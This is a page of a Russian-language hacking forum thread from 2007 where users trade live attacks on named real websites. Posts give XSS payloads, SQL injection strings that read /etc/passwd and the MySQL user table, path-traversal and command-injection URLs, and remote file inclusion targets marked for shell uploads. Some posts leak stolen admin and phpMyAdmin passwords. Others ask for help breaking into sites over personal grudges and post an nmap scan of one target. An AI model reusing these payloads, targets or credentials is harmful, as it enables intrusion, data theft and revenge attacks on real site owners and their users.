Форумы  Правила форума  Сегодняшние посты 
Зарегистрироваться  Вход  Мой профиль  Входящие  Адресная книга  Моя подписка  Мои форумы  Выход
Текстовая версия  Список пользователей  Карта  Top-100 пользователей  Календари  Ticket List  Фото галерея
ПОИСК  FAQ 
RSS:  20 последних сообщений форума 20 последних топиков форума

RE: Раздача слонов II

 
Посмотреть связанные обсуждения: (в этом форуме | во всех форумах)

Зашли как: Guest
Пользователи, просматривающие топик: none
  Версия для печати
Все форумы >> [Взлом] >> В Сети >> RE: Раздача слонов II Страниц: <<   < пред  1 2 [3] 4 5   след >   >>
Имя
Сообщение << Старые топики   Новые топики >>
RE: Раздача слонов II - 10.09.2007 18:51:05   
PROPHET07

Сообщений: 80
Оценки: 0
Присоединился: 11.08.2007
так им, порнушникам))))



(в ответ на blacksun)
Post #: 81
RE: Раздача слонов II - 10.09.2007 20:37:48  1 голосов
blacksun


Сообщений: 2363
Оценки: 4
Присоединился: 27.09.2006
Откуда: из Тюмени
quote:

ORIGINAL: Microhip

вот такой сайтик ломонуть можно http://www.city-price.info ?

XSS: http://www.city-price.info/?mode=catalog&sm=10&sw=%3Csсriрt%3Ealert%28document.cookie%29%3C%2Fsсriрt%3E

(в ответ на Microhip)
Post #: 82
RE: Раздача слонов II - 10.09.2007 22:10:04   
А. Нука

Сообщений: 17
Оценки: 0
Присоединился: 08.09.2007
[deleted]

< Сообщение отредактировано А. Нука -- 16.09.2007 17:23:38 >

(в ответ на PROPHET07)
Post #: 83
RE: Раздача слонов II - 10.09.2007 22:44:41  1 голосов
blacksun


Сообщений: 2363
Оценки: 4
Присоединился: 27.09.2006
Откуда: из Тюмени
http://www.tectonic.co.za/view.php?id=1465'

(в ответ на А. Нука)
Post #: 84
RE: Раздача слонов II - 11.09.2007 20:04:06   
PROPHET07

Сообщений: 80
Оценки: 0
Присоединился: 11.08.2007
http://www.3rb-bgb.com/index.php?file='

(в ответ на blacksun)
Post #: 85
RE: Раздача слонов II - 13.09.2007 12:53:40   
MethodMan

Сообщений: 1
Оценки: 0
Присоединился: 13.09.2007
Нашел баг в ABO.CMS в mod/documents/lib/download.php  переменная path не фильтруется, что позволяет скачать любой файл или посмотреть содержимое директорий.

Вот пример использования http://club.president-centre.ru/mod/documents/lib/download.php?path=index.php

Тут список бажных сайтов http://www.abocms.ru/demo/abo-site/

P.S. Если доступ к БД не разрешен снаружи, посмотрите папку бэкапов в /admin/ там может что-то лежать ;)

(в ответ на ISRAEL)
Post #: 86
RE: Раздача слонов II - 14.09.2007 18:14:06   
ViD0K

Сообщений: 135
Оценки: 0
Присоединился: 10.07.2007
Откуда: Из госнаркоконтроля)
Вот это можно еще расскрутить http://roadrock.web2001.cz/index.php?module=Static_Docs&func=view&f=./../

(в ответ на MethodMan)
Post #: 87
RE: Раздача слонов II - 14.09.2007 18:20:31   
ViD0K

Сообщений: 135
Оценки: 0
Присоединился: 10.07.2007
Откуда: Из госнаркоконтроля)
мож тут еще чо выгорит http://is.muni.cz/dok/rfmgr.pl?lang=en;furl=%2Fdo%2F1433%2Fnapsali_o_isu%./../;info=

(в ответ на ViD0K)
Post #: 88
RE: Раздача слонов II - 14.09.2007 18:40:33   
ViD0K

Сообщений: 135
Оценки: 0
Присоединился: 10.07.2007
Откуда: Из госнаркоконтроля)
И напаследок:
http://digite.cz/index.php?id=259'&cl=Nevsedni_bezdratove_handsfree__Supertooth_II_a_Pama_PN_Go_9_Sun_Visor___1/2
http://things.magick.cz/magick/index.php?id=68'&co=celej
http://eng.opf.slu.cz/index.php?id=87'
http://www.mamenato.cz/www/index.php?id=51'
http://www.sysifos.cz/index.php?id=vypis'&sec=1186081105

(в ответ на ViD0K)
Post #: 89
RE: Раздача слонов II - 30.09.2007 2:56:39   
AlekseyB123

Сообщений: 11
Оценки: 0
Присоединился: 29.09.2007
ViD0k, первую разкрутил...
http://digite.cz/index.php?id=259+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*
/etc/passwd : -->
http://digite.cz/index.php?id=259+union+select+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*
а вот http://digite.cz/index.php?id=259+union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user+limit+1,1/*
пассворд не даёт =\
если юзать from+information_schema.columns то вообще все пусто =\

(в ответ на ViD0K)
Post #: 90
RE: Раздача слонов II - 09.10.2007 22:36:24   
Fak1r

Сообщений: 5
Оценки: 0
Присоединился: 02.11.2006
quote:

ORIGINAL: AlekseyB123

ViD0k, первую разкрутил...
http://digite.cz/index.php?id=259+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*
/etc/passwd : -->
http://digite.cz/index.php?id=259+union+select+1,2,load_file(0x2F6574632F706173737764),4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1/*
а вот http://digite.cz/index.php?id=259+union+select+1,2,user,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user+limit+1,1/*
пассворд не даёт =\
если юзать from+information_schema.columns то вообще все пусто =\



Вот, но шел не получилось залить, мускуль не записывает в файл
/home/webmaster/digite.cz/php/index.php
Админка: http://digite.cz/php/ USER==felix PASS==nikita
digite.cz/phpmyadmin/ user:digite pass:NscN2rrB,t5hFbDf

(в ответ на AlekseyB123)
Post #: 91
RE: Раздача слонов II - 25.10.2007 12:52:13   
Paranoic

Сообщений: 59
Оценки: 0
Присоединился: 23.04.2007
Откуда: из транслюдского космоса
quote:

ORIGINAL: Серенький
http://www.mioo.ru/podrazdinfpage.php?id=73'

я бы даже сказал http://www.mioo.ru/podrazdinfpage.php?id=116'&prjid=805'
а также
http://szuo.mioo.ru/
http://suo.mioo.ru/
http://svuo.mioo.ru/
и др... (szuo, suo, svuo - название округов Москвы)
везде уязвимы поля Логин и Пароль, правда бд там - InterBase

(в ответ на Серенький)
Post #: 92
RE: Раздача слонов II - 25.10.2007 15:35:24   
spectrum

Сообщений: 54
Оценки: 0
Присоединился: 18.05.2006
civru.com XSS в строке поиска

(в ответ на ISRAEL)
Post #: 93
RE: Раздача слонов II - 31.10.2007 5:50:08  1 голосов
blacksun


Сообщений: 2363
Оценки: 4
Присоединился: 27.09.2006
Откуда: из Тюмени
http://bible.crosswalk.com/History/AD/EarlyChurchFathers/Ante-Nicene/Tertullian/view.cgi?file=|cd%20..;cd%20..;ls%20-la|

(в ответ на spectrum)
Post #: 94
RE: Раздача слонов II - 14.11.2007 9:19:22   
BuriK665

Сообщений: 13
Оценки: 0
Присоединился: 26.10.2007
quote:

ORIGINAL: blacksun

http://bible.crosswalk.com/History/AD/EarlyChurchFathers/Ante-Nicene/Tertullian/view.cgi?file=|cd%20..;cd%20..;ls%20-la|


http://bible.crosswalk.com/History/AD/EarlyChurchFathers/Ante-Nicene/Tertullian/view.cgi?file=|uname%20-a|
жгут =)

(в ответ на blacksun)
Post #: 95
RE: Раздача слонов II - 14.11.2007 10:24:22  1 голосов
kolPeeX

 

Сообщений: 1519
Оценки: 102
Присоединился: 25.01.2007
http://predictioncenter.org/casp/casp7/public/cgi-bin/text.cgi?file=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://predictioncenter.org/casp/casp7/public/cgi-bin/text.cgi?file=text.cgi

(в ответ на BuriK665)
Post #: 96
RE: Раздача слонов II - 14.11.2007 19:26:34   
Sida

Сообщений: 32
Оценки: 0
Присоединился: 14.11.2007
quote:

Есть сайт они меня кинули с квартирой хотелось бы наказать только уязвимостей ненахажу! Кто че может посоветовать? Оч хотелось бы завалить
http://npk.perm.ru - Казлы блин


http://npk.perm.ru/admin/login.php

http://npk.perm.ru/myadmin/

Пробуй

< Сообщение отредактировано Sida -- 14.11.2007 19:32:16 >

(в ответ на blacksun)
Post #: 97
RE: Раздача слонов II - 15.11.2007 10:58:17   
vanish_88

Сообщений: 2
Оценки: 0
Присоединился: 15.11.2007
http://adee.dental.tcd.ie/index.php?file=../../../../../../../../../../etc/passwd
http://www.rennsportnews.de/index.php?load=../../../../../../../../../../etc/passwd
http://cdmea.org/ohs/index.php?page=../../../../../../../../../../etc/passwd
http://www.anwalt-roehrs.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.krakusband.art.pl/index.php?page=../../../../../../../../../../etc/passwd
http://zseem.ids.bielsko.pl/szok/index.php?page=../../../../../../../../../../etc/passwd
http://weitereinfos.net/index.php?page=../../../../../../../../../../etc/passwd
http://www.adem.pl/index.php?page=../../../../../../../../../../etc/passwd
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/passwd
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/passwd
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.hautzeit.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.prekladzdarma.cz/index.php?page=../../../../../../../../../../etc/passwd
http://www.reimernautik.de/index.php?page=../../../../../../../../../../etc/passwd
http://dmwdev.com/index.php?page=../../../../../../../../../../etc/passwd
http://tble.souljazz.com/index.php?page=../../../../../../../../../../etc/passwd
http://www.velvethills.org/index.php?page=../../../../../../../../../../etc/passwd
http://saintteresachurch.org/index.php?page=../../../../../../../../../../etc/passwd
http://www.powertechrepairs.com/index.php?page=../../../../../../../../../../etc/passwd
http://learning4excellence.com/index.php?page=../../../../../../../../../../etc/passwd

[link=http://www.spaeni-methodic.ch/index.php?page=http://site/cmd.php]http://www.spaeni-methodic.ch/index.php?page=http://site/cmd.php[/link]


(в ответ на Sida)
Post #: 98
RE: Раздача слонов II - 16.11.2007 2:45:31   
MrSaros

Сообщений: 4
Оценки: 0
Присоединился: 16.11.2007
quote:

ORIGINAL: MethodMan

Нашел баг в ABO.CMS в mod/documents/lib/download.php  переменная path не фильтруется, что позволяет скачать любой файл или посмотреть содержимое директорий.

Вот пример использования http://club.president-centre.ru/mod/documents/lib/download.php?path=index.php


P.S. Если доступ к БД не разрешен снаружи, посмотрите папку бэкапов в /admin/ там может что-то лежать ;)



http://club.president-centre.ru/login.php?
логин admin
пароль 235813

< Сообщение отредактировано MrSaros -- 16.11.2007 3:01:33 >

(в ответ на MethodMan)
Post #: 99
RE: Раздача слонов II - 17.11.2007 10:29:34   
Shif

Сообщений: 22
Оценки: 0
Присоединился: 14.11.2007
ВОТ КТО-БЫ ПОМОГ http://www.prijateli.com/ БОМБАНУТЬ????

(в ответ на ISRAEL)
Post #: 100
RE: Раздача слонов II - 17.11.2007 13:09:52  1 голосов
testatat

Сообщений: 16
Оценки: 0
Присоединился: 30.10.2007
Откуда: 671
а сам?? а хуле? давай учись учись учись !!!!!!!!

(в ответ на Shif)
Post #: 101
RE: Раздача слонов II - 17.11.2007 17:01:56   
dew


Сообщений: 300
Оценки: 0
Присоединился: 09.12.2006
Откуда: Тюменская область
Маааленький подарок, учитесь на здоровье!!!
инклуды:
http://conval.de/main.php?page=[shell]
http://www.tot.co.th/tot/th/500.php?page=[shell]
http://www.traductera.com/fr/index.php?a=[shell]
http://www.treds.it/index.php?page=[shell]
http://www.tryvannstua.no/?p=[shell]
http://www.tubmanfamilyalliance.org/news/news.php?article=[shell]
http://www.tut-coach.com/site.php?page=[shell]
http://www.t-vips.com/index.php?page=[shell]
http://www.ulmairreunion.com/page.php?page=[shell]
http://www.umeahardcore.com/index.php?p=[shell]
http://www.uneekjewelry.com/index.php?page=[shell]
http://www.unpr.ro/romanian/index.php?do=[shell]
http://www.uppolizia.it/index.php?browse=[shell]
http://www.verwaltungstreff.de/neuerserver/stellenlehrer/index.php?id=[shell]
http://www.via-ferrata.de/bergsport-seiten/index.php?id=[shell]
http://www.vidacapoeira.com/index.php?zobraz_stranku=[shell]
http://www.vivaldiecardino.com/index.php?param=[shell]

(в ответ на testatat)
Post #: 102
RE: Раздача слонов II - 24.11.2007 22:01:47   
Nachtigall

Сообщений: 29
Оценки: 0
Присоединился: 24.11.2007
Откуда: Київ
Здраствуйте люди!
Нужна помощь с сайтом гомосеков:  "http://antifa.com.ua"
(если кому-то нравится такое проявление "антифашизма", то посмотрите эту тему: http://antifa.com.ua/topic.php?forum=1&topic=775  ... И она не единственная.)
Вот, пролистал форум.. Многое испробовал, но почти ничего не помогло, разве что выдало:


Warning: array_keys() [function.array-keys]: The first argument should be an array in /usr/home/zog/data/www/antifa.com.ua/news.php on line 46
Warning: array_slice() [function.array-slice]: The first argument should be an array in /usr/home/zog/data/www/antifa.com.ua/news.php on line 47
Warning: Invalid argument supplied for foreach() in /usr/home/zog/data/www/antifa.com.ua/news.php on line 48



Подскажите пожалуйста, какую пользу из этого можна извлечь, или как ещё можно получить доступ к сайту.

Заранее - спасибо!
ICQ: 199  -  514  -  437

(в ответ на dew)
Post #: 103
RE: Раздача слонов II - 24.11.2007 22:30:22   
PROPHET07

Сообщений: 80
Оценки: 0
Присоединился: 11.08.2007
ошибки то и тут :
http://antifa.com.ua/listattachedfiles.php

ещё на сайте есть галлерея:
http://antifa.com.ua/gallery/index.php

но врятли всё это даст хоть что-нибудь......

< Сообщение отредактировано PROPHET07 -- 24.11.2007 22:31:31 >

(в ответ на Nachtigall)
Post #: 104
RE: Раздача слонов II - 25.11.2007 2:28:01   
FreeKing

Сообщений: 31
Оценки: 0
Присоединился: 25.11.2007
http://www.disco80.ru/?an='
и не только, кавычка действует в других местах

(в ответ на PROPHET07)
Post #: 105
RE: Раздача слонов II - 25.11.2007 14:52:31   
Nachtigall

Сообщений: 29
Оценки: 0
Присоединился: 24.11.2007
Откуда: Київ
quote:

ORIGINAL: PROPHET07

ошибки то и тут :
http://antifa.com.ua/listattachedfiles.php

ещё на сайте есть галлерея:
http://antifa.com.ua/gallery/index.php

но врятли всё это даст хоть что-нибудь......

Спасибо и за это! По немногу,- и взломаем ;)

(в ответ на PROPHET07)
Post #: 106
RE: Раздача слонов II - 25.11.2007 16:33:15   
Nachtigall

Сообщений: 29
Оценки: 0
Присоединился: 24.11.2007
Откуда: Київ
отчёт Nmap про antifa.com.ua Как можно использовать данные открытые порты? Подскажите пожалуйста.



Starting Nmap 4.23RC2 ( http://insecure.org ) at 2007-11-25 15:31 ,  (Initiating Ping Scan at 15:31
Scanning 62.149.15.125 [2 ports]
Completed Ping Scan at 15:31, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:31
Scanning 62.149.15.125 [1709 ports]
Discovered open port 25/tcp on 62.149.15.125
Discovered open port 22/tcp on 62.149.15.125
Discovered open port 21/tcp on 62.149.15.125
Discovered open port 53/tcp on 62.149.15.125
Discovered open port 443/tcp on 62.149.15.125
Discovered open port 80/tcp on 62.149.15.125
Discovered open port 3306/tcp on 62.149.15.125
Discovered open port 993/tcp on 62.149.15.125
Discovered open port 12345/tcp on 62.149.15.125
Discovered open port 873/tcp on 62.149.15.125
Discovered open port 143/tcp on 62.149.15.125
Discovered open port 995/tcp on 62.149.15.125
Increasing send delay for 62.149.15.125 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 62.149.15.125 from 5 to 10 due to max_successful_tryno increase to 6
Warning: Giving up on port early because retransmission cap hit.
Discovered open port 110/tcp on 62.149.15.125
Completed SYN Stealth Scan at 15:32, 22.67s elapsed (1709 total ports)
Initiating Service scan at 15:32
Scanning 13 services on 62.149.15.125
Completed Service scan at 15:33, 113.98s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against 62.149.15.125
SCRIPT ENGINE: Initiating sсriрt scanning.
Initiating SCRIPT ENGINE at 15:34
Completed SCRIPT ENGINE at 15:34, 0.05s elapsed
Host 62.149.15.125 appears to be up ... good.
Interesting ports on 62.149.15.125:
Not shown: 1689 closed ports
PORT      STATE    SERVICE        VERSION
21/tcp    open     ftp            ProFTPD 1.3.0
22/tcp    open     ssh            OpenSSH 4.5p1 (FreeBSD 20061110; protocol 2.0)
25/tcp    open     smtp
53/tcp    open     domain
80/tcp    open     http           Apache httpd 1.3.37 ((Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e-p1)
110/tcp   open     pop3
135/tcp   filtered msrpc
136/tcp   filtered profile
137/tcp   filtered netbios-ns
138/tcp   filtered netbios-dgm
139/tcp   filtered netbios-ssn
143/tcp   open     imap?
443/tcp   open     ssl            OpenSSL
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
873/tcp   open     rsync           (protocol version 29)
993/tcp   open     ssl            OpenSSL
995/tcp   open     ssl            OpenSSL
3306/tcp  open     mysql          MySQL 5.0.45-log
12345/tcp open     tcpwrapped
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25-TCP:V=4.23RC2%I=7%D=11/25%Time=4749795A%P=i686-pc-windows-windows%r(NULL,2D,"220\x20dana\.hvosting\.net\x20ESMTP\x20Hello,\x20beavers!\r\n"
SF:)%r(Hello,48,"220\x20dana\.hvosting\.net\x20ESMTP\x20Hello,\x20beavers!
SF:\r\n501\x20Syntax:\x20EHLO\x20hostname\r\n")%r(Help,56,"220\x20dana\.hv
SF:osting\.net\x20ESMTP\x20Hello,\x20beavers!\r\n502\x205\.5\.2\x20Error:\
SF:x20command\x20not\x20recognized\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port110-TCP:V=4.23RC2%I=7%D=11/25%Time=4749795A%P=i686-pc-windows-windows%r(NULL,15,"\+OK\x20Hello,\x20beavers!\r\n")%r(GenericLines,43,"\+OK\x20H
SF:ello,\x20beavers!\r\n-ERR\x20Unknown\x20command\.\r\n-ERR\x20Unknown\x2
SF:0command\.\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port143-TCP:V=4.23RC2%I=7%D=11/25%Time=4749795A%P=i686-pc-windows-windows%r(NULL,16,"\*\x20OK\x20Hello,\x20beavers!\r\n")%r(GetRequest,7A,"\*\x20O
SF:K\x20Hello,\x20beavers!\r\nGET\x20BAD\x20Error\x20in\x20IMAP\x20command
SF:\x20received\x20by\x20server\.\r\n\*\x20BAD\x20Error\x20in\x20IMAP\x20c
SF:ommand\x20received\x20by\x20server\.\r\n")%r(GenericLines,78,"\*\x20OK\
SF:x20Hello,\x20beavers!\r\n\*\x20BAD\x20Error\x20in\x20IMAP\x20command\x2
SF:0received\x20by\x20server\.\r\n\*\x20BAD\x20Error\x20in\x20IMAP\x20comm
SF:and\x20received\x20by\x20server\.\r\n")%r(HTTPOptions,7E,"\*\x20OK\x20H
SF:ello,\x20beavers!\r\nOPTIONS\x20BAD\x20Error\x20in\x20IMAP\x20command\x
SF:20received\x20by\x20server\.\r\n\*\x20BAD\x20Error\x20in\x20IMAP\x20com
SF:mand\x20received\x20by\x20server\.\r\n")%r(RTSPRequest,7E,"\*\x20OK\x20
SF:Hello,\x20beavers!\r\nOPTIONS\x20BAD\x20Error\x20in\x20IMAP\x20command\
SF:x20received\x20by\x20server\.\r\n\*\x20BAD\x20Error\x20in\x20IMAP\x20co
SF:mmand\x20received\x20by\x20server\.\r\n")%r(RPCCheck,16,"\*\x20OK\x20He
SF:llo,\x20beavers!\r\n")%r(DNSVersionBindReq,16,"\*\x20OK\x20Hello,\x20be
SF:avers!\r\n")%r(DNSStatusRequest,16,"\*\x20OK\x20Hello,\x20beavers!\r\n"
SF:)%r(Help,4A,"\*\x20OK\x20Hello,\x20beavers!\r\nHELP\x20BAD\x20Error\x20
SF:in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n")%r(SSLSessionR
SF:eq,48,"\*\x20OK\x20Hello,\x20beavers!\r\n\x16\x03\x20BAD\x20Error\x20in
SF:\x20IMAP\x20command\x20received\x20by\x20server\.\r\n")%r(SMBProgNeg,37
SF:,"\*\x20OK\x20Hello,\x20beavers!\r\n\x20BAD\x20Invalid\x20characters\x2
SF:0in\x20atom\r\n")%r(X11Probe,16,"\*\x20OK\x20Hello,\x20beavers!\r\n")%r
SF:(FourOhFourRequest,7A,"\*\x20OK\x20Hello,\x20beavers!\r\nGET\x20BAD\x20
SF:Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n\*\x20B
SF:AD\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n"
SF:)%r(LPDString,4E,"\*\x20OK\x20Hello,\x20beavers!\r\n\x01default\x20BAD\
SF:x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n")%r
SF:(LDAPBindReq,16,"\*\x20OK\x20Hello,\x20beavers!\r\n")%r(SIPOptions,231,
SF:"\*\x20OK\x20Hello,\x20beavers!\r\nOPTIONS\x20BAD\x20Error\x20in\x20IMA
SF:P\x20command\x20received\x20by\x20server\.\r\nVia:\x20BAD\x20Error\x20i
SF:n\x20IMAP\x20command\x20received\x20by\x20server\.\r\nFrom:\x20BAD\x20E
SF:rror\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\nTo:\x20B
SF:AD\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\nC
SF:all-ID:\x20BAD\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20s
SF:erver\.\r\nCSeq:\x20BAD\x20Error\x20in\x20IMAP\x20command\x20received\x
SF:20by\x20server\.\r\nMax-Forwards:\x20BAD\x20Error\x20in\x20IMAP\x20comm
SF:and\x20received\x20by\x20server\.\r\nContent-Length:\x20BAD\x20Error\x2
SF:0in\x20IMAP\x20command\x20received\x20by\x20server\.\r\nContact:\x20BAD
SF:\x20Error\x20in\x20IMAP\x20command\x20received\x20by\x20server\.\r\n\*\
SF:x20BYE\x20Too\x20many\x20invalid\x20IMAP\x20commands\.\r\n");
Device type: general purpose
Running: FreeBSD 6.X
OS details: FreeBSD 6.1-RELEASE - 6.2
Uptime: 4.908 days (since Tue Nov 20 17:46:04 2007)
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OSs: Unix, FreeBSD

Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.703 seconds
           Raw packets sent: 2642 (117.842KB) | Rcvd: 1755 (81.134KB)

_________________________

добавлено чуть позже:
_________________________

Инфо про их форум:
Powered by ExBB
ExBB FM 1.0 Beta by TvoyWeb.ru
InvisionExBB Style converted by Markus®


Сейчас буду искать эксплоиты.. Если кому-то уже известны какие-то, прошу, помогите мне ;)

< Сообщение отредактировано Nachtigall -- 26.11.2007 21:32:54 >

(в ответ на Nachtigall)
Post #: 107
RE: Раздача слонов II - 27.11.2007 4:00:41   
AKYLA

Сообщений: 7
Оценки: 0
Присоединился: 27.11.2007
Ребята помогайте, вот эти козлы http://www.pelmsi.kiev.ua:80/ мало того что всех спамом ужастно забивают, так еще и разводят народ на $ на свои курсы.
Я просканил все, но ничего не нашел вообще, может у кого выдет что-то найти

(в ответ на PROPHET07)
Post #: 108
RE: Раздача слонов II - 28.11.2007 0:29:42   
De}{is

Сообщений: 137
Оценки: 0
Присоединился: 22.11.2005
к выборам

http://viperson.ru/wind.php?ID='

*так и не понял ресурс официальный или нет, но ип зараза палит

(в ответ на AKYLA)
Post #: 109
RE: Раздача слонов II - 30.11.2007 23:07:23   
Paranoic

Сообщений: 59
Оценки: 0
Присоединился: 23.04.2007
Откуда: из транслюдского космоса
На сайте ASUSTek`a - xss
http://support.asus.com/download/download.aspx?SLanguage=ru-ru&model=%3Csсriрt%3Ealert('xss')%3C/sсriрt%3E

(в ответ на De}{is)
Post #: 110
RE: Раздача слонов II - 01.12.2007 22:21:22   
FreeKing

Сообщений: 31
Оценки: 0
Присоединился: 25.11.2007
http://www.aronis.kiev.ua/index.php?pageid=[SQL.INJ]
Видно название БД, имя таблицы, каталог - UNION работает...
Как узнать имя таблицы админки, или только перебором? и что еще оттуда можно извлечь - помогите начинающему:)

(в ответ на Paranoic)
Post #: 111
RE: Раздача слонов II - 01.12.2007 22:25:05   
blаcksun


Сообщений: 1682
Оценки: 0
Присоединился: 19.11.2007
Откуда: Тюмень
quote:

ORIGINAL: FreeKing

http://www.aronis.kiev.ua/index.php?pageid=[SQL.INJ]
Видно название БД, имя таблицы, каталог - UNION работает...
Как узнать имя таблицы админки, или только перебором? и что еще оттуда можно извлечь - помогите начинающему:)

http://forum.xakep.ru/m_978175/tm.htm

+ На ачате море видео по скуль инекциям.

(в ответ на FreeKing)
Post #: 112
RE: Раздача слонов II - 02.12.2007 14:07:20   
shtopor_jjot

Сообщений: 3
Оценки: 0
Присоединился: 02.12.2007
помогите плиз с http://exbee.net/

(в ответ на blаcksun)
Post #: 113
RE: Раздача слонов II - 02.12.2007 15:29:06   
AKYLA

Сообщений: 7
Оценки: 0
Присоединился: 27.11.2007
quote:

помогите плиз с http://exbee.net/

/index/>"><ScRiPt>alert('test')</ScRiPt>
/index.php/>"><ScRiPt>alert(1089719942)</ScRiPt>

(в ответ на shtopor_jjot)
Post #: 114
RE: Раздача слонов II - 02.12.2007 18:14:14   
shtopor_jjot

Сообщений: 3
Оценки: 0
Присоединился: 02.12.2007
ох спс, а еще чтонить можно сделать? Посерьезнее?

(в ответ на AKYLA)
Post #: 115
RE: Раздача слонов II - 03.12.2007 3:09:17   
AKYLA

Сообщений: 7
Оценки: 0
Присоединился: 27.11.2007
shtopor_jjot
quote:

ох спс, а еще чтонить можно сделать? Посерьезнее?

Пока ничего, но там вроде бы должен быть file inject, но мне так и не удалось его сделать

(в ответ на shtopor_jjot)
Post #: 116
RE: Раздача слонов II - 03.12.2007 20:51:38  1 голосов
MarkLuk

Сообщений: 2
Оценки: 0
Присоединился: 03.12.2007
Посоветуйте как можно в сайт залезть? www.starsat.kz и вообще с чего нужно начинать ?

(в ответ на AKYLA)
Post #: 117
RE: Раздача слонов II - 03.12.2007 21:06:05  1 голосов
MarkLuk

Сообщений: 2
Оценки: 0
Присоединился: 03.12.2007
Посоветуйте как можно в сайт залезть? www.starsat.kz и вообще с чего нужно начинать ?

(в ответ на MarkLuk)
Post #: 118
RE: Раздача слонов II - 04.12.2007 0:07:29   
AKYLA

Сообщений: 7
Оценки: 0
Присоединился: 27.11.2007
http://korolev-city.org.ru
XSS
quote:

/?c=0&o=>'><ScRiPt%20%0a%0d>alert(11111111)%3B</ScRiPt>
/?c=0&o=</textarea><ScRiPt%20%0a%0d>alert(694215251)%3B</ScRiPt>


MarkLuk
Не советую сюда писать с вопросом с чего начинать, а то забанят, ты не в ту тему пишешь.

(в ответ на MarkLuk)
Post #: 119
RE: Раздача слонов II - 08.12.2007 2:06:16   
ДомосеД

Сообщений: 13
Оценки: 0
Присоединился: 27.09.2007
XSS http://ictv.ua/ukr/search.php?search=1&news_search=1&news_search_words=&news_search_cond=&news_search_exact=&news_search_numrows=&search_section_id=0&search_words=%3Csсriрt%3Ealert%28%27xss%27%29%3C%2Fsсriрt%3E&search_cond=1&search_exact=1&search_numrows=5 - украинский телеканал

(в ответ на AKYLA)
Post #: 120
Страниц:   <<   < пред  1 2 [3] 4 5   след >   >>
Все форумы >> [Взлом] >> В Сети >> RE: Раздача слонов II Страниц: <<   < пред  1 2 [3] 4 5   след >   >>
Перейти к:





Новые сообщения Нет новых сообщений
Популярные с новыми сообщениями Популярные без новых сообщений
Заблокированные с новыми сообщениями Заблокированные без сообщений
 Новое сообщение
 Ответ
 Новое голосование
 Оставить голос
 Удалить мой пост
 Удалить мое обсуждение
 Оценить пост









Rambler's Top100
0.422